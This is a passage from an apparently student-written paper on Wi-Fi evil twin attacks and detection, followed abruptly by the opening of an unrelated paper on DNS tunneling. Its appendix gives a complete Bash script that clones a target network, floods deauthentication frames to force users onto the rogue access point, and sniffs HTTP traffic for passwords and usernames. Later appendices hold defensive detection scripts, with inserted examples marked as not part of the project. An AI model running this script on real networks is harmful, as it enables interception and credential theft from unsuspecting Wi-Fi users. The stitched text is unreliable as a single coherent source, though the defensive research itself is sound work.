As for the software, we have used many different Linux tools, accessible through the command line. The most important ones are ifconfig and iwconfig. These two tools provide information about the interfaces, and allow changing their configuration. Iwconfig is more focused on wireless interfaces, and allows for example setting an interface to monitor mode, while ifconfig is used for more general purposes, such as activating or deactivating an interface. We used another tool named iwlist that gives information on the networks detected by a wireless interface.

We also used the aircrack-ng module [1] that contains many different “hacking” tools. However we only used one of them, aireplay-ng, which allows sending frames (that comes in handy for the deauthentication part). Finally we used create_ap, a tool [4] that allows the creation of an access point specifying the desired ESSID, the Internet access interface, and the outgoing interface.

4.2 Methodology
The program evil_twin.sh that we have written is a Bash script that performs the evil twin attack on open Wi-Fi. The code is provided in Appendix I. Below is the explanation of the main ideas of this implementation.

First of all, we ask the user which interface he wants to use for the connection to the Internet, for the access point, and for the deauthentication. This is a necessary step for portability, because the Wi-Fi card’s interface name can change from one computer to another, and is very likely to change from one Wi-Fi dongle to another.

Then the script shows a list of the existing nearby APs, and asks the user to select one to perform the attack on. The next step is to scan the network, and keep only information (ESSID, BSSID, channel) about the previously selected AP.

After this, we can create the rogue AP. We do this using create_ap and specifying the access point interface, the Internet access interface, and the ESSID of the Wi-Fi, that will of course be the target Wi-Fi’s name.

Now that we have created the evil twin, we need the users to connect to it. That is, we need to disconnect them from the legitimate AP and hope our rogue AP has a stronger signal so that they automatically reconnect to ours. Placing our computer physically closer to the users than the legitimate AP can contribute to the success of the operation.

For this part we first need to set the deauthentication interface in monitor mode. Then in a loop, a deauthentication attack is launched against every AP with the target ESSID (in case the target Wi-Fi is actually composed of various different APs), broadcasting deauthentication frames with aireplay-ng. At this point all of the users of the target AP should be disconnected, and are likely to automatically reconnect to the evil twin.

The implementation of an Evil Twin access point for WPA/WPA2 networks with a known Pre-Shared-Key is similar to that of open Wi-Fi. WPA/WPA2-PSK networks are predominant in most restaurants and coffee shops where the Pre-Shared-Key is displayed in public. Most members of the public believe that as long as there’s a password for the Wi-Fi network, it is secured. However, the following steps will show how easy it is to set up a Man-In-The-Middle attack for these networks.

First, a rogue AP will be created just as the previous section states, except that this time, we will change the network type to WPA/WPA2-PSK and assign the same Pre-Shared-Key as that of the target network. Following which, deauthentication frames will be broadcast to the target network to bump off all existing users from that network. Finally, the victims will automatically connect to the Evil Twin Access Point and the Man-In-The-Middle position is gained by the attacker.

4.3 Results
We tested this script using different devices as the user, running on either iOS, Android or Windows 7. There was no difference between them: they all got disconnected as intended when broadcasting deauthentication frames. However, some devices do not accept broadcast deauthentication frames. This problem was remedied by sending a targeted deauthentication frame to that device. The reconnection also automatically started on all of these devices. Most of the time, it reconnected to the evil twin. However, sometimes, especially when the legitimate AP was closer than the rogue AP, the device was reconnecting to the legitimate one, which is not our goal.

The results for the WPA/WPA2-PSK network are the same as for the open Wi-Fi network. The important thing to note regarding the protected networks is that even when they are deauthenticated from the target network and automatically connect to the Evil Twin AP, the users are not prompted to re-enter the password. This will prevent even knowledgeable individuals from getting suspicious.

5. PROPOSED COUNTERMEASURES
There are various ways to prevent the evil twin attack from happening whether on the client side or on the access point side. In this section we will discuss some of them and evaluate their efficacy.

Figure 4. Notification of ongoing attack

5.1 Detection of Deauthentication
Similar to spoofing a deauthentication frame, it is also easy for us to sniff what kind of frames are sent over the air, provided that they are not encrypted from our perspective: thus, we are able to monitor the rate at which deauthentication frames are sent to or from the AP’s MAC address. If this rate is unusually high, there is a high chance that a deauthentication attack is taking place. Furthermore, the deauthentication frames are almost always broadcast and the Reason Code for deauthentication is always the same: “Class 3 frame received from nonassociated STA” (0x0007). When we combine these three conditions, it is possible to detect deauthentication attacks with a high probability.

5.2 Detection of Evil Twin
As we have discussed in previous sections the evil twin is a rogue access point that possesses the same ESSID as a legitimate one and may or may not have the same BSSID as well.

In the case of a cloned BSSID, a way to detect the attack is to scan the neighbouring access points regularly and notify the user when two APs have the same ESSID and BSSID but are on different channels. This usually does not happen unless an attack is ongoing.

If the rogue AP has an arbitrary BSSID different from the legitimate one, the details of the APs alone do not give enough information to detect an ongoing attack. As such a user could create a whitelist containing all the ESSIDs
he trusts and their corresponding BSSIDs. For example the home setup of a user could be composed of multiple APs in order to have good coverage inside his whole house. When setting up those APs, the user whitelists their corresponding BSSIDs. Then a program scans the access points regularly and informs the user when an available AP is not whitelisted (figure 5).

Combining these two approaches allows for an easy-to-implement client-side detection of the evil twin attack. The main drawback is the difficulty of maintaining a correct and up-to-date whitelist of the trusted APs.

5.3 Integrity check of management frames
As we have implemented, we are able to easily spoof either the AP’s or the client's MAC address and send deauthentication frames on their behalf, even if the network is encrypted with a key unknown to the attacker. The flaw lies in the fact that management frames are unencrypted. What can be done to prevent the deauthentication attack is simple: make the Wi-Fi network encrypted if not already so, and protect the management frames in addition to the data frames so that we can enforce their confidentiality as well as authenticity. This way, it is difficult, if not impossible, for an attacker to impersonate the clients or the AP since the attacker will have to know the shared key established between them to pass the integrity check.

In 2009, a new protocol that adds this feature to the existing Wi-Fi protocol was officially released, named 802.11w [7]. This protects not only the data frames but also the management frames such as deauthentication, and thus is immune to such attacks from outside.

5.4 Security at Higher Layers
If the Wi-Fi protocol, which operates at both the physical and data link layer, fails to provide the security requirements, it is possible to rely on higher layers. As an example it is now common practice to use the HTTPS protocol (application layer) in order to secure connections to websites. HTTPS is not itself free from vulnerabilities, though, SSL strip being one example. Furthermore, even if appropriate security measures at higher layers may prevent a MiTM from reading, tampering with or replaying the packets, the attacker could still block some or all of them.

6. IMPLEMENTATION OF SELECTED COUNTERMEASURES
In the following sections we will describe our own implementations of two of the countermeasures described in section 5.

6.1 Detection of Deauthentication
We have used the following tools to implement a proof-of-concept deauthentication detection program, detect_deauth.py.
- Python 2.7 with scapy library, on Ubuntu Linux
- Wi-Fi dongle (for monitor interface)

The algorithm of detect_deauth.py is very simple and is as follows:

1. Set the Wi-Fi dongle to monitor mode. This allows us to use the interface to sniff packets being sent in the air.
2. Specify which MAC address to monitor.
3. For every deauthentication frame sniffed by the interface, check its source and destination MAC address. If either of the two fields contains the target MAC address, we increment the deauth counter.
4. If the rate of deauthentication frames per minute is above the threshold specified by the user, we print out a warning.

The way we distinguish deauthentication frames from other types of frames is by the frame type and subtype: management frames are of type 0, and further, deauthentication frames are of subtype 12. See Appendix V for the list of types and subtypes of IEEE 802.11 frames. Note that it is somewhat difficult to determine exactly the rate beyond which we recognize that a deauthentication attack is in place and below which we assume normal operation. This is because deauthentication frames are a part of the legitimate network protocol and are sent back and forth between two authentic machines. Here, our goal is to demonstrate the feasibility of detecting deauthentication frames, and thus such a complication is simplified by allowing the user to specify the rate.

6.2 Detection of Evil Twin attack
In the bash script evil_twin_detect.sh provided in appendix III, we implemented the defence mechanisms described in section 5.2. This script can be run on the computer of a client while he is connected to the internet and as soon as an evil twin attack is detected, the client is informed by a notification. This program lists all the APs with the same ESSID as that of the AP the client is connected to. It checks that no two of those share the same BSSID and that all are in the client’s whitelist. If one of these conditions is not met a notification is sent to inform the client of a possible ongoing attack. The whitelist is a text file named authorised.list (a sample is provided in appendix IV) which must follow the following format: the first line consists of an integer X denoting the number of different whitelisted ESSIDs. This line is followed by X blocks. Each one begins with the ESSID on the first line, then an integer Y denoting the number of accepted BSSIDs, followed by the Y BSSIDs each on a new line.

7. CONCLUSION
In this paper, we have implemented a Man-In-The-Middle attack on both Open Wi-Fi and WPA/WPA2-PSK protected Wi-Fi. This was done by setting up an Evil Twin AP and broadcasting deauthentication frames in the target network to kick current users off from the network. Following which, the users’ devices will automatically reconnect to the Evil Twin AP which will grant us the Man-In-The-Middle position. Finally, we have also proposed and implemented two countermeasures. The first method detects suspicious deauthentication frames and the second method detects Evil Twin Access Points.

In conclusion, we have proven how insecure Open Wi-Fi networks and WPA/WPA2-PSK networks are and that it is easy for a malicious user to perform all manner of MiTM attacks on these networks once he is in position.

8. ACKNOWLEDGEMENTS
We would like to thank Professor Hugh Anderson for his guidance and advice during the entirety of this project. We would also like to thank him for loaning us the necessary equipment that was vital in completing this project.

9. REFERENCES
[1] Aircrack-ng. 2017. Aircrack-ng’s website. Retrieved November 6, 2017 from https://www.aircrack-ng.org/

[2] Darkaudax. 2014. Tutorial: Is My Wireless Card Compatible? Retrieved November 9, 2017 from https://www.aircrack-ng.org/doku.php?id=compatible_cards

[3] Info-communications Media Development Authority. 2017. Wireless@SG Hotspot List. Retrieved October 23, 2017 from https://www.imda.gov.sg/~/media/imda/files/community/consumer%20education/wirelless%20sg/hotspot%20list1.pdf

[4] Oblique. 2013. Create_ap’s GitHub project. Retrieved November 6, 2017 from https://github.com/oblique/create_ap

[5] Frank Piessens and Mathy Vanhoef. 2014. Advanced Wi-Fi Attacks Using Commodity Hardware. Retrieved November 9, 2017 from https://people.cs.kuleuven.be/~mathy.vanhoef/papers/acsac2014.pdf

[6] Frank Piessens and Mathy Vanhoef. 2017. Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2. Retrieved November 9, 2017 from https://papers.mathyvanhoef.com/ccs2017.pdf

[7] IEEE. 2009. 802.11w Protected Management Frames. Retrieved November 12, 2017 from http://grouper.ieee.org/groups/802/11/Reports/tgw_update.htm

10. APPENDIX
The code is also available at :
https://github.com/CS3235-project/wifi-spoofing

I. EVIL_TWIN.SH
#!/bin/bash
echo "Enter interface for monitoring/injection"
read interface_deauth
echo "Enter interface for rogue AP"
read interface_ap
echo "Enter facing interface"
read interface_faceing
echo "Enter Wi-Fi type 1: Open, 2: WPA/WPA2 PSK"
read wifitype

if [ $wifitype = 2 ]
then
    echo "Please enter the passphrase"
    read -s passphrase
fi
echo "Setting up interfaces, this might take a while"

ifconfig ${interface_deauth} down
iwconfig ${interface_deauth} mode managed
ifconfig ${interface_deauth} up
sleep 5s
ifconfig ${interface_ap} down
iwconfig ${interface_ap} mode managed
ifconfig ${interface_ap} up
sleep 5s

#shows a list of the neighbouring APs
iwlist ${interface_deauth} scan | grep "ESSID"

echo "Enter the ESSID of the target AP"
read essid

#stores in an array information about APs with the given ESSID (MAC address, channel, ESSID)
array=( $(sudo iwlist ${interface_deauth} scan | grep "Address\|Channel:\|ESSID:" | grep -B 2 "${essid}") )

#variable used to keep track of the index of the array
count=0

echo "Do you really want to attack ${essid} Yes/No ?"
read response

if [ $response = Yes ]
then
    echo "Attack launched"
    if [ $wifitype = 1 ]
    then
        #a rogue AP with the target ESSID is created
        xterm -hold -e create_ap ${interface_ap} ${interface_faceing} "${essid}" &
        sleep 5s
        echo " Wireless Network ${essid} created"
    fi

    if [ $wifitype = 2 ]
    then
        xterm -hold -e create_ap ${interface_ap} ${interface_faceing} "${essid}" ${passphrase} &
        sleep 5s
        echo "Wireless Network ${essid} created"
    fi

    #puts the deauthing interface into monitor mode, necessary for injecting deauthentication frames
    ifconfig ${interface_deauth} down
    iwconfig ${interface_deauth} mode monitor
    ifconfig ${interface_deauth} up

    #a deauthentication attack is launched against every AP with the target ESSID
    for i in "${array[@]}"
    do
        #these magic constants (%8, -eq 4) are designed to extract the required information from the grep output
        if [ $(($count%8)) -eq 4 ]
        then
            #stores the target AP's MAC address
            address=$i
        fi
        if [ $(($count%8)) -eq 5 ]
        then
            #stores the target AP's channel
            channel="${i//[!0-9]/}"

            #switches the channel of the deauthing interface to the target AP's channel
            iwconfig ${interface_deauth} channel ${channel}

            #deauthenticate users connected to the target AP
            (xterm -hold -e aireplay-ng -0 15 -a ${address} ${interface_deauth} &)
        fi
        ((++count))
    done
fi

xterm -hold -e "tcpdump -i ${interface_ap} port http -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20" &

II. DEAUTH_DETECT.PY
#!/usr/bin/env python

""" execute with root permission
let wlan1 be the interface used for monitoring. Then either
1. Use airmon-ng start wlan1
   to set up interface named mon0
2. Do manually:
   ifconfig wlan1 down
   iwconfig wlan1 mode monitor
   iwconfig wlan1 channel (set to whichever channel the AP is in)
   ifconfig wlan1 up

Make sure that the channel in which your AP is active and the channel your monitoring interface
is in are the same.
"""

import sys
import socket
import time
import string
from scapy.all import *

# global variables such that they are accessible from the event handler
target_mac = None  # must be lowercase
target_essid = None  # must be lowercase, compared against lowercased beacon ESSIDs
deauth_count = 0
last_time_deauth_received = 0
threshold = 0

def sniff_req(packet):
    """ event handler for scapy's sniff method
    the argument is the packet received
    """
    ## DEBUG-MODE
    # if packet.haslayer(Dot11):
    #     print packet.sprintf("packet from AP [%Dot11.addr2%] to Client [%Dot11.addr1%]")

    # look for a deauth packet
    if packet.haslayer(Dot11Deauth):
        global deauth_count, last_time_deauth_received
        current_time = time.time()
        # start a new one-minute counting window
        if current_time - last_time_deauth_received > 60:
            last_time_deauth_received = current_time
            deauth_count = 0
        deauth_count += 1
        print packet.sprintf("Deauth from AP [%Dot11.addr2%] to Client [%Dot11.addr1%], "
                             "Reason [%Dot11Deauth.reason%]")
        print 'count/min = %d' % (deauth_count)
        # step 4 of the algorithm in section 6.1: warn above the user-specified rate
        if deauth_count > threshold:
            print 'WARNING: more than %d deauth frames per minute' % (threshold)

def info(fm):
    """ beacon handler: records the BSSID advertising the target ESSID """
    if fm.haslayer(Dot11):
        # management frame (type 0), beacon (subtype 8)
        if fm.type == 0 and fm.subtype == 8:
            captured_essid = str(fm.info).strip()
            captured_essid = string.lower(captured_essid)
            # print captured_essid  # uncomment this line to check if scanning properly
            global target_essid
            if captured_essid == target_essid:
                global target_mac
                target_mac = fm.addr2

def is_mac_found(p):
    """ function that is supposed to be passed to sniff() to terminate sniffing
    """
    global target_mac
    return target_mac != None

def find_mac_from_essid(interface):
    """ converts ESSID to MAC address. Timeout is set to 4
    """
    sniff(iface=interface, prn=info, timeout=4)

def main():
    """ main function
    """
    if len(sys.argv) < 4:
        print 'Wrong command arguments'
        print '1. specify your interface used for monitoring'
        print '2. specify the network to monitor'
        print '3. specify the deauth frame count limit per min'
        print 'for example:\n ' + sys.argv[0] + ' mon0 myWifi 40'
        sys.exit()

    global target_mac, threshold, last_time_deauth_received, target_essid

    interface = sys.argv[1]
    # lowercased because info() lowercases the ESSIDs it captures
    target_essid = string.lower(sys.argv[2])
    threshold = int(sys.argv[3])

    print 'scanning for the MAC address of %s' % (target_essid)
    find_mac_from_essid(interface=interface)
    if target_mac is None:
        print 'corresponding mac address was not found.'
        print 'is the network up?'
        sys.exit()

    target_mac = string.lower(target_mac)

    last_time_deauth_received = time.time()
    # Berkeley Packet Filter format
    filter_statement = "ether src " + target_mac

    print 'now monitoring ESSID(%s) with BSSID(%s) on interface %s' % (target_essid, target_mac, interface)
    sniff(filter=filter_statement, iface=interface, prn=sniff_req)
    # sniff(iface=interface, prn=sniff_req)  # uncomment this line to test that the filter is working

if __name__ == '__main__':
    main()
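
The three conditions of section 5.1 (rate, broadcast destination, reason code 0x0007) applied to raw frames identified by type 0 / subtype 12 as in section 6.1, as an added example in standard-library Python 3; it is not part of the project's code. The MAC addresses, the frame bytes, the 90% reading of "almost always broadcast" and the verdict names are assumptions made for the example, and frames are expected without a radiotap header.

```python
import struct
from collections import deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
REASON_CLASS3 = 0x0007  # reason code quoted in section 5.1


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def parse_deauth(frame):
    """Return addresses and reason code of a deauthentication frame, else None.

    Assumes a raw 802.11 MAC frame: no radiotap header, no trailing FCS.
    """
    if len(frame) < 26:  # 24-byte management header + 2-byte reason code
        return None
    fc0 = frame[0]
    version, ftype, subtype = fc0 & 0x3, (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    if (version, ftype, subtype) != (0, 0, 12):  # management, deauthentication
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return {
        "dst": mac_str(frame[4:10]),     # addr1, receiver
        "src": mac_str(frame[10:16]),    # addr2, claimed sender (not authenticated)
        "bssid": mac_str(frame[16:22]),  # addr3
        "reason": reason,
    }


class DeauthMonitor:
    """Sliding one-minute window over deauth frames to or from one AP."""

    def __init__(self, ap_mac, threshold_per_min, window=60.0):
        self.ap_mac = ap_mac.lower()
        self.threshold = threshold_per_min
        self.window = window
        self.events = deque()  # (timestamp, sent_to_broadcast, reason)

    def observe(self, ts, frame):
        """Feed one frame; return a verdict, or None if it is not a deauth for this AP."""
        d = parse_deauth(frame)
        if d is None or self.ap_mac not in (d["src"], d["dst"]):
            return None
        self.events.append((ts, d["dst"] == BROADCAST, d["reason"]))
        while ts - self.events[0][0] > self.window:
            self.events.popleft()
        return self.verdict()

    def verdict(self):
        n = len(self.events)
        high_rate = n > self.threshold
        # Assumption: "almost always broadcast" is read as at least 90% of frames.
        broadcast = sum(1 for _, b, _ in self.events if b) >= 0.9 * n
        same_reason = {r for _, _, r in self.events} == {REASON_CLASS3}
        if high_rate and broadcast and same_reason:
            return "attack-likely"
        return "high-rate" if high_rate else "normal"


AP, STA = "02:00:00:00:00:01", "02:00:00:00:00:aa"  # constructed addresses


def constructed_frame(fc0, dst, src, bssid, reason):
    """Sample capture bytes for the demo (constructed, not a real capture)."""
    raw = lambda m: bytes(int(x, 16) for x in m.split(":"))
    return (bytes([fc0, 0]) + b"\x00\x00" + raw(dst) + raw(src) + raw(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))


def demo():
    results = {}
    quiet = DeauthMonitor(AP, threshold_per_min=40)
    # A beacon (subtype 8) is not a deauthentication frame and is ignored.
    results["beacon"] = quiet.observe(0.0, constructed_frame(0x80, BROADCAST, AP, AP, 0))
    leave = constructed_frame(0xC0, AP, STA, AP, 3)  # a client leaving normally
    results["quiet"] = [quiet.observe(t, leave) for t in (5.0, 50.0)]
    flood = DeauthMonitor(AP, threshold_per_min=40)
    spoofed = constructed_frame(0xC0, BROADCAST, AP, AP, REASON_CLASS3)
    results["flood"] = [flood.observe(100 + 0.15 * i, spoofed) for i in range(64)]
    results["after"] = flood.observe(300.0, leave)  # the window has drained
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value[-1] if isinstance(value, list) else value)
```

A burst of unicast deauthentications with mixed reason codes only reaches "high-rate", which keeps the stronger verdict for traffic that matches all three conditions at once.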

III. EVIL_TWIN_DETECT.SH
#!/bin/bash

#basic version of a defence program against hotspot spoofing
#given some preferred essid and MAC, if another MAC with the same SSID exists
#a notification warns the user

echo "Enter scanning interface"
read interface
mapfile -t myArray < authorised.list
while true
do
    index=1
    for j in $(seq 0 $((myArray[0]-1)))
    do
        count=0
        SSID=${myArray[index]}
        ((++index))
        connectedSSID=$(iwgetid -r)
        array=( $(iwlist ${interface} scan | grep Address ) )
        connectedMAC=${array[4]}
        nbAuthorisedMacs=${myArray[index]}
        ((++index))
        if [ "$SSID" == "$connectedSSID" ]
        then
            array=( $(sudo iwlist ${interface} scan | grep 'Address\|ESSID:' | grep -B 1 "\"${SSID}\"") )
            sameMac=0
            for i in "${array[@]}"
            do
                if [ $((count%7)) -eq 4 ]
                then
                    #echo "${i}"
                    #echo "${connectedMAC}"
                    if [ "${connectedMAC}" == "$i" ]
                    then
                        ((++sameMac))
                    fi
                    problem="YES"
                    for k in $(seq $index $((index+nbAuthorisedMacs-1)))
                    do
                        if [ "${myArray[k]}" == "$i" ]
                        then
                            problem="NO"
                        fi
                    done
                    if [ "$problem" != "NO" ] && [ "${i}" != "ESSID:\"$SSID\"" ]
                    then
                        notify-send "Warning, wifi ${SSID} may be compromised"
                        echo "Warning, unexpected MAC : ${i}"
                    fi
                fi
                ((++count))
            done
            if [ "$sameMac" != "1" ]
            then
                notify-send "Warning, wifi ${SSID} may be compromised"
                echo "Warning, there are ${sameMac} AP with identical MAC"
            fi
        fi
        index=$((index+nbAuthorisedMacs))
    done
done

IV. WHITE.LIST
2
NUS
2
88:F0:31:8D:21:CF
A8:9D:21:F3:70:8F
NUSOPEN
1
58:2A:F7:9E:45:A4
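
The whitelist format of section 6.2 and the two checks of section 5.2 (a BSSID seen on several channels, a BSSID missing from the whitelist), as an added example in standard-library Python 3; it is not the project's script. The whitelist text is the sample above, while the scan tuples, the alert names and the choice to skip the whitelist check for an ESSID that has no whitelist block are assumptions made for the example.

```python
import re

MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}$")


def parse_whitelist(text):
    """Parse the authorised.list format of section 6.2 into {essid: set(bssid)}."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    pos = 0

    def take(what):
        nonlocal pos
        if pos >= len(lines):
            raise ValueError("truncated whitelist, expected %s" % what)
        pos += 1
        return lines[pos - 1]

    def take_count(what):
        value = take(what)
        if not value.isdecimal():
            raise ValueError("%s must be an integer, got %r" % (what, value))
        return int(value)

    whitelist = {}
    for _block in range(take_count("number of ESSIDs")):
        essid = take("ESSID")
        bssids = set()
        for _entry in range(take_count("number of BSSIDs for " + essid)):
            bssid = take("BSSID")
            if not MAC_RE.match(bssid):
                raise ValueError("not a MAC address: %r" % bssid)
            bssids.add(bssid.lower())
        whitelist[essid] = bssids
    if pos != len(lines):
        raise ValueError("unexpected data after the declared blocks")
    return whitelist


def check_scan(whitelist, connected_essid, scan):
    """Return alerts for the connected ESSID.

    scan is a list of (essid, bssid, channel) tuples taken from a Wi-Fi scan.
    """
    alerts = []
    allowed = whitelist.get(connected_essid)  # None: ESSID has no whitelist block
    channels = {}
    for essid, bssid, channel in scan:
        if essid != connected_essid:
            continue
        bssid = bssid.lower()
        channels.setdefault(bssid, set()).add(channel)
        if allowed is not None and bssid not in allowed:
            alerts.append(("not-whitelisted", bssid, channel))
    # Section 5.2: the same ESSID and BSSID on different channels suggests a clone.
    for bssid, seen in sorted(channels.items()):
        if len(seen) > 1:
            alerts.append(("cloned-bssid", bssid, tuple(sorted(seen))))
    return alerts


# Whitelist sample from Appendix IV.
SAMPLE_WHITELIST = """2
NUS
2
88:F0:31:8D:21:CF
A8:9D:21:F3:70:8F
NUSOPEN
1
58:2A:F7:9E:45:A4
"""

# Constructed scan results: one whitelisted BSSID also appears on channel 11,
# and one BSSID (constructed address) is not in the whitelist.
SAMPLE_SCAN = [
    ("NUS", "88:F0:31:8D:21:CF", 1),
    ("NUS", "A8:9D:21:F3:70:8F", 6),
    ("NUS", "88:F0:31:8D:21:CF", 11),
    ("NUS", "02:00:00:00:00:66", 6),
    ("NUSOPEN", "58:2A:F7:9E:45:A4", 1),
]


def demo():
    return check_scan(parse_whitelist(SAMPLE_WHITELIST), "NUS", SAMPLE_SCAN)


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

A malformed or truncated whitelist raises ValueError instead of being read with shifted indices, so a damaged file cannot silently widen the set of trusted BSSIDs.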

V. TYPES AND SUBTYPES OF IEEE 802.11 MANAGEMENT FRAMES

Exploiting DNS Protocol as a Covert Channel
Amarparkash Singh Mavi Chua Lin Jing Chu Ying Yu
School of Computing School of Computing School of Computing
National University of Singapore National University of Singapore National University of Singapore
13 Computing Drive 13 Computing Drive 13 Computing Drive
Singapore 117417 Singapore 117417 Singapore 117417
a0123935@u.nus.edu a0131188@u.nus.edu e0002358
Hou Ruomu Joelle Lim Yan Yi
School of Computing School of Computing
National University of Singapore National University of Singapore
13 Computing Drive 13 Computing Drive
Singapore 117417 Singapore 117417
a0131421@u.nus.edu a0127032@u.nus.edu

ABSTRACT

In this paper, we analyse how the Domain Name System (DNS) protocol can be exploited and used as a carrier for covert channel communication in the context of DNS Tunneling. We have performed a case study on one of the state-of-the-art DNS Tunneling tools, Iodine to determine the current approaches that have been utilised in exploiting the protocol and subsequently examined the prevalence of the phenomenon empirically through a set of experimental trials. In general, the approach has been centered on manipulating resource records of DNS messages and therefore, we implemented a proof of concept to explore how other elements such as the Time-to-Live (TTL) field could be manipulated to establish a covert channel, thereby bypassing firewalls. We conclude with a comparative analysis between the traditional use of resource records and the use of TTL field in DNS Tunneling.

Categories and Subject Descriptors
[Network Security]: Web Protocol Security

General Terms
Security

Keywords
Covert Channel, Domain Name System (DNS), Resource Record, Time-to-Live (TTL) Field, DNS Tunneling.

1. INTRODUCTION
Fuelled by the motivation to bypass paying for Wi-Fi at airports, people have found ways to exploit the DNS protocol which allowed them to surf the web for free. Since then, there has been a greater motivation for exploiting the DNS protocol with objectives that include the exfiltration of confidential data from enterprises by setting up a covert channel between the infected computer and a fake DNS server. Such an attack is classified as DNS Tunneling which essentially utilises fields within DNS messages as covert carriers for tunneling data.

In this paper, we provide an analysis of how the DNS protocol can be exploited and used as a carrier for covert channel communication in the context of DNS Tunneling. The discussion is structured as follows.

In section 2, we provide a background of key topics relevant to the project, namely covert channel, DNS protocol and DNS Tunneling in order to facilitate the discussion in subsequent sections. Subsequently, in section 3, we perform a case study on one of the state-of-the-art DNS Tunneling tools, Iodine and discuss the experimental trials conducted using Iodine to empirically examine the prevalence of the phenomenon. Following this, in section 4, we provide an overview of the current defenses and the motivation for exploring the TTL field as a viable covert carrier in DNS Tunneling. In section 5, we detail the implementation of our proof of concept that successfully utilises the TTL field as a covert carrier in DNS Tunneling. In the last section, we provide an evaluation of the differences between the traditional use of resource records and the use of the TTL field in DNS Tunneling based on a self-defined set of criteria.

2. BACKGROUND
In this section, we provide the necessary background description and explanation of the key topics relevant to the project in order to facilitate the discussion in subsequent sections.

2.1 Covert Channel
A covert channel is essentially a communication channel that is exploited for an unauthorised exchange of information, thereby violating the security policy of a system [1]. There exist multiple classifications of covert channels and a specific type of covert channel that we are examining is a network-based covert channel. Network-based covert channels are channels that employ network protocols as carriers of communication. It usually involves utilizing the protocol in a manner that it is not intended for. In our case, the network protocol being exploited is DNS with the specific attack type being DNS Tunneling.

2.2 DNS Protocol
DNS is the protocol responsible for translating human-readable domain names into IP addresses that the network protocol

recognises. The motivation for DNS was really to bridge the gap between the language that the computer understands and the language that we humans understand. Computers identify entities on the network using IP addresses. However, it is counter-intuitive for us humans to identify websites or hosts in general, using their IP addresses. That explains the need for a mapping in the form of DNS. It is one of the hugely significant protocols that we unknowingly utilise countless times on a daily basis. It takes effect whenever we enter a website URL into the browser. This action prompts a DNS query to resolve the website’s IP address. This IP address essentially identifies the web server that is subsequently queried with a HTTP request to serve the webpage. By default, DNS utilises port 53 for its service.

Figure 1. Hierarchical Structure of DNS Domain Namespace

DNS is essentially implemented as a hierarchical and distributed database [2] to facilitate scalable management of the extensive number of registered domain names that continues to grow rapidly. This actually gives rise to a tree structure identified as the domain namespace (as shown in figure 1 [2]) which provides the basis for uniquely identifying a host based on a given domain name. For instance, as shown in figure 1, the domain name mydomain.microsoft.com comprises different labels that are separated by dots where each label corresponds to a level within the namespace hierarchy. Through the specified labels, it allows the host to be uniquely identified by traversing the corresponding path in the hierarchy. The domain name mydomain.microsoft.com is also identified as the fully qualified domain name (FQDN). A FQDN is a domain name that comprises a hostname and a domain [9]. In this context, the hostname would be mydomain while the domain is microsoft.com. Essentially, the domain name that a client would request to resolve using DNS would be a FQDN.

In order to facilitate the unique identification of a host and the corresponding resolution of its IP address, there are key fields present in a DNS message that are classified as resource records. Each resource record type provides corresponding information for a domain name. Such information of a domain name is queried using DNS queries that have to specify the type of information requested in terms of the resource record type, along with the domain name [9]. Table 1 shows some of the common resource record types along with the associated information they provide. Each resource record also has a corresponding TTL field associated with it that specifies the validity of the record [3].

Table 1. Table of Common Resource Record Types

Resource Record Type    Associated Information
A                       IPv4 address
CNAME                   Alias of domain name
NS                      Domain name of authoritative name server
MX                      Domain name of mail server
TXT                     Any text

There are generally two ways in which a client can use DNS to resolve a domain name to an IP address. The first method involves a non-recursive query. In this case, the client contacts the DNS servers individually until it locates the authoritative name server that contains the queried domain name. The other method involves a recursive query where the client simply transmits a query that requests for the IP address of the queried domain name and in return, it expects a response that contains the resolved IP address of the domain name [4]. Recursive queries are essentially the most common form of DNS queries. In this case, the query is directed to a recursive name server that resolves the FQDN on behalf of the client through an iterative process [9].

Figure 2. Domain Name Resolution through Recursive Query

Figure 2 [9] provides a simplified illustration of how a domain name is resolved through a recursive name server. It can be seen that the client essentially transmits a DNS query to the recursive name server that requests for the A resource record of the specified domain name, www.inria.fr. The recursive name server then iteratively queries the various domain levels of the domain name in order to resolve it [9]. It starts off with a query to a root server to determine the authoritative name server of the domain name fr by requesting for the corresponding NS resource record. It then repeats this iteratively until it gets contact with the authoritative name server of inria.fr (dns.cs.wisc.edu) where it transmits a query to resolve the FQDN (www.inria.fr) which is similar to the query initiated by the client to the recursive name server. Once this is determined, the response is then forwarded to the client and the resolution process is complete.

In general, caching is implemented in recursive name servers to store resource records of domain names for a specified time period corresponding to the value of the TTL field [6]. This is done so as to prevent frequent forward lookups as illustrated in figure 2 and therefore, optimise the efficiency of the protocol.

2.3 DNS Tunneling
DNS Tunneling is an attack type that exploits the DNS protocol as a covert channel by encoding data within DNS messages. It essentially exploits the fact that communication on port 53 with the local DNS server is not filtered on most networks. The reason for this common negligence is because DNS is essentially not perceived as a protocol that facilitates data transfer [6] but rather as a primary supporting protocol that is needed before any communication can be initiated using other protocols such as HTTP. As such, it is a protocol that is generally overlooked from a security viewpoint and allowed by firewalls [9]. The situation is further compounded by the fact that networks usually implement recursive queries where the local DNS server acts as a recursive DNS server. As such, this leaves significant room for the protocol to be exploited as a covert channel. In the case of an enterprise, an attacker with access to an internal machine on the local network can essentially tunnel confidential data over DNS to a domain that he controls. This could facilitate data exfiltration or in general, tunneling of any internet protocol (IP) traffic [6] which even allows casual users to leverage this for internet surfing in open Wi-Fi networks, something that we would further elaborate upon as part of our experimental trials in section 3.2.

The fields typically exploited in DNS Tunneling are resource records as highlighted in the previous section. These fields are essentially utilised as covert carriers for tunneling data over DNS. However, as we would demonstrate in a later section, an alternative to resource records would be TTL fields that can also be employed as covert carriers. The motivation for this has to do largely with current defenses such as semantic analysis which particularly target the exploitation of resource records.

3. CASE STUDY OVERVIEW
